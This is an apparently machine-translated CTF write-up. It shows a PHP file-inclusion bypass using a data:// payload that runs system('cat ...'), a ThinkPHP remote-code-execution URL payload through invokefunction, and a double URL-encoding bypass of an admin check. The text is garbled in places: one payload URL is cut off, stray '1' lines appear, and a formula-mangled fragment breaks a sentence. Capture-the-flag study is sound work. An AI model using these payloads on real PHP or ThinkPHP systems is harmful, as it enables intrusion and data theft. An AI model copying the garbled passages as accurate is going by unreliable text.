CTF record

Source audit

File contains ： 

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

1. php://input   + post  data php Code . 

2. ?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?> 

thinkphp rce Pay attention when exploiting vulnerabilities payload 

Exploit ：
payload：
see phpinfo：

http://your-ip:8080/index.php？s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
1
View sensitive files ：

http://your-ip:8080/index.php？s=/Index/\think\app/invokefunction&function=call_user_func_
 

<?php
if("admin"===$_GET[id]) {			
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "admin")
{
  echo "<p>Access granted!</p>";
  echo "<p>Key: xxxxxxx </p>";
}
?>

Can you anthenticate to this website?

First step , To make "admin"===$_GET[id] Don't set up
We can admin Conduct url code , Of course, you can also code one of the letters here a Encoding ：%61dmin

The first practical comparison if("admin"==="%61dmin")   Don't set up
1
The second step , after G E T [ i d ] = u r l d e c o d e ( _GET[id] = urldecode( 
G
​
 ET[id]=urldecode(_GET[id]);, bring $_GET[id] == "admin" establish .
after urldecode After decoding, it becomes admin

The second practical comparison if("admin" == "admin");     establish
1
** Be careful ：** When the parameter is passed in id when , The browser will be right and wrong later ASCII The character of the code is carried out once urlencode code , It will be automatically performed once when running urldecode

Because we are url Run directly in the connection , The browser will make a url decode , So we'll do it again url code , That's right admin Code twice and then run

urldecode(%2561)=%61  
urldecode(%61)=a